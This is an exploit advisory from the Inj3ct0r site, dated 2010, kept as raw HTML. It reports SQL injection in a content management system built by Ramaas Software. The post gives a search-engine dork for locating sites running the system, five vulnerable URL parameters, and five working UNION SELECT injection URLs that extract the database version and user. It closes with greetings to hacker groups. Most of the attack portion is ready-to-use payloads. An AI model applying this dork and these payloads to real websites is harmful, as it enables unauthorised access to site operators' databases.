Ramaas Software CMS SQL Injection Vulnerability
Posted on 27 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Ramaas Software CMS SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== Ramaas Software CMS SQL Injection Vulnerability =============================================== # Exploit Title: Ramaas Software CMS SQL Injection Vulnerability # Version: Web Application # Tested on: Apcahe/Unix # Dork : intext:"Powered by Ramaas Software" # Code : --------------------------------------------------------------------------------------- ############################################################################ #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] #Thanks: SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum #Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d #Catch us at www.andhrahackers.com or www.teamicw.in ############################################################################ This Is The CMS Created by The Leading WebDevelopment Company ramaas.com For There Clients and all have same vulnerability..... Exploited Link : 1) http://example.com/display_agents.php?id=243' 2) http://example.com/view.php?articleid=14567' 3) http://example.com/view_businessnews.php?articleid=7' 4) http://example.com/view_article.php?articleid=12242' 5) http://example.com/article.php?articleid=111' Demo : 1) http://example.com/display_agents.php?id=-243+union+select+all+1,2,3,version(),5,user(),7,8-- 2) http://example.com/view.php?articleid=-14567+union+select+all+1,2,3,version(),5,user(),7,8,9,10-- 3) http://example.com/view_businessnews.php?articleid=-7+union+select+all+1,2,3,version(),user(),6,7,8,9-- 4) http://example.com/view_article.php?articleid=-12242+union+select+all+1,2,3,version(),user(),6,7,8,9-- 5) http://example.com/article.php?articleid=-111+union+select+all+1,2,3,version(),5,user(),7,8,9,10,11-- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
